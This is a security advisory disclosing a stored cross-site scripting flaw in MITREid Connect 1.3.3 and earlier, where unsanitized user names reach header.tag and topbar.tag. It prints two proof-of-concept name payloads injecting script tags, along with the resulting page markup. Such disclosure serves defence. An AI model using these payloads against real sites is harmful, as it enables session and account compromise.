Share
MITREid Connect OpenID-Connect-Java-Spring-Server  
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server> version  
1.3.3 and earlier is vulnerable to Cross-Site Scripting; the users name is  
included in *topbar.tag* and *header.tag* without being sanitized. A user  
can set their name to a value like:  
  
Test</script><script>alert(1)</script>  
  
Which will be included in JSON used by a JavaScript function in *header.tag*  
:  
  
// get the info of the current user, if available (null otherwise)  
> function getUserInfo() {  
> return {"sub":"12318767","name":"  
> *Test</script><script>alert(1)</script>*  
> Test","preferred_username":"Test","given_name":"Test</script><script>alert(1)</script>","family_name":"Test","email":"  
> test@test.com","email_verified":true};}  
  
  
A name such as:  
  
Test<script>alert(1)</script>  
  
would also work; it is included in the page when menus are created by  
*topbar.tag*:  
  
<!-- use a simplified user button system when collapsed -->  
> <ul class="nav hidden-desktop">  
> <li><a href="manage/#user/profile">*Test<script>alert(1)</script>*  
> Test</a></li>  
> <li class="divider"></li>  
> <li><a href="" class="logoutLink"><i class="icon-remove"></i> Log  
> out</a></li>  
  
  
This issue has been reported on Github  
<https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/issues/1521>  
with  
patches pending.  
  
A write up is available at:  
https://www.securitymetrics.com/blog/MITREid-Connect-cross-site-scripting-CVE-2020-5497